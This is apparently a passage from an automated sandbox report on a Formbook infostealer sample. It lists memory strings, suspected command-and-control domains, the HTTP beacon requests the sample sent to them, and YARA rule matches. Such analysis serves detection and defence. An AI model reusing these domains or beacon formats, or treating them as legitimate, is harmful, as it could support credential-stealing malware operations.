          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roundaboutlogistics.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starryallure.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starryallure.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starryallure.com/rs10/www.roundaboutlogistics.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starryallure.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.totalkfood.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.totalkfood.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.totalkfood.com/rs10/www.cryptarrow.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.totalkfood.comReferer:
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/www.fhstbanknigeria.com
          Source: explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.activedirectory.
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.li
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://account.live-int
          Source: explorer.exe, 00000003.00000003.2192098195.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000089B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSdX
          Source: explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://buy.live.com/
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark
          Source: explorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hHhh7.img
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxkRJ.img
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.co
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps
          Source: explorer.exe, 00000003.00000000.1327499164.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3081706085.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3805799384.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.0000000008903000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://passwordreset.micros
          Source: explorer.exe, 00000003.00000002.3809058677.000000000B9B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000B9B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comeer0
          Source: explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tip.passwordreset.microso
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000003.00000000.1327499164.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000002.3812069415.0000000010A6F000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3797952972.0000000004DAF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/best-cities-by-generation/
          Source: unknownDNS traffic detected: queries for: www.zg9tywlubmftzw5ldzi0mdm.com
          Source: C:\Windows\explorer.exeCode function: 3_2_10E29F82 getaddrinfo,setsockopt,recv,3_2_10E29F82
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1Host: www.fhstbanknigeria.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1Host: www.m-baer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1Host: www.totalkfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1Host: www.cryptarrow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1Host: www.starryallure.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
